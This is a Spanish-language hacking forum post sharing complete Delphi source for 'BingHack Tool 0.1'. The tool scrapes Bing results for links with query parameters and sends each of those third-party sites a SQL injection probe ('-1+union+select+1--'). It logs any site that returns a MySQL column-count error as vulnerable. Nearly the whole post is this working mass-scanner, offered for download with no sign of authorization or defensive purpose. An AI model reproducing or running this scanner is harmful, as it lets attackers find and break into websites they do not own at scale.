[Delphi] BingHack Tool 0.1

Iniciado por BigBear, Mayo 31, 2013, 03:53:33 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Mayo 31, 2013, 03:53:33 PM Ultima modificación: Mayo 31, 2013, 05:23:02 PM por Doddy
Traduccion a delphi de este programa para buscar paginas vulnerables a SQLI usando bing.

Una imagen :



El codigo :

Código: delphi

// BingHackTool 0.1
// Coded By Doddy H

unit bing;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sMemo, sSkinManager, PerlRegEx, IdBaseComponent,
  IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, sEdit, sLabel, sGroupBox,
  sListBox, ComCtrls, sStatusBar, ShellApi, jpeg, ExtCtrls;

type
  TForm1 = class(TForm)
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    sSkinManager1: TsSkinManager;
    PerlRegEx2: TPerlRegEx;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sEdit1: TsEdit;
    sLabel2: TsLabel;
    sEdit2: TsEdit;
    sGroupBox2: TsGroupBox;
    sListBox1: TsListBox;
    sGroupBox3: TsGroupBox;
    sListBox2: TsListBox;
    sStatusBar1: TsStatusBar;
    sGroupBox4: TsGroupBox;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    Image1: TImage;
    procedure sButton1Click(Sender: TObject);
    procedure sButton4Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure sButton2Click(Sender: TObject);
    procedure sListBox1DblClick(Sender: TObject);
    procedure sListBox2DblClick(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  Writeln(ar, texto);
  CloseFile(ar);

end;

procedure TForm1.FormCreate(Sender: TObject);
var
  dir: string;
begin

  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;

  dir := ExtractFilePath(Application.ExeName) + '/logs';

  if not(DirectoryExists(dir)) then
  begin
    CreateDir(dir);
  end;

  ChDir(dir);

end;

procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  chau: TStringList;
  target: string;

begin

  sListBox1.Items.Clear;

  target := StringReplace(sEdit1.text, ' ', '+', []);

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := 1 to StrToInt(sEdit2.text) do
  begin
    ii := i * 10;
    sListBox1.Update;
    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;

    code := IdHTTP1.Get('http://www.bing.com/search?q=' + target + '&first=' +
        IntToStr(ii));

    PerlRegEx1.Regex := '<h3><a href="(.*?)"';
    PerlRegEx1.Subject := code;

    while PerlRegEx1.MatchAgain do
    begin
      for z := 1 to PerlRegEx1.SubExpressionCount do
        link1 := PerlRegEx1.SubExpressions[z];

      PerlRegEx2.Regex := '(.*?)=(.*?)';
      PerlRegEx2.Subject := link1;

      if PerlRegEx2.Match then
      begin
        linkfinal := PerlRegEx2.SubExpressions[1] + '=';
        sListBox1.Items.Add(linkfinal);
      end;
    end;
  end;

  chau := TStringList.Create;

  chau.Duplicates := dupIgnore;
  chau.Sorted := True;
  chau.Assign(sListBox1.Items);
  sListBox1.Items.Clear;
  sListBox1.Items.Assign(chau);

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('bing-search.txt', sListBox1.Items[i]);
  end;

  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;

end;

procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;

begin

  sListBox2.Items.Clear;

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin

        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;
        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');

        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;

        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;

      end;
    except
      on E: EIdHttpProtocolException do
        ;
      on E: Exception do
        ;
    end;

    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;

  end;

end;

procedure TForm1.sButton3Click(Sender: TObject);
begin
  ShowMessage('Contact to lepuke[at]hotmail[com]');
end;

procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close();
end;

procedure TForm1.sListBox1DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'bing-search.txt', nil, nil, SW_SHOWNORMAL);
end;

procedure TForm1.sListBox2DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'sqli-founds.txt', nil, nil, SW_SHOWNORMAL);
end;

end.

// The End ?


Si quieren bajar el programa pueden hacerlo de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario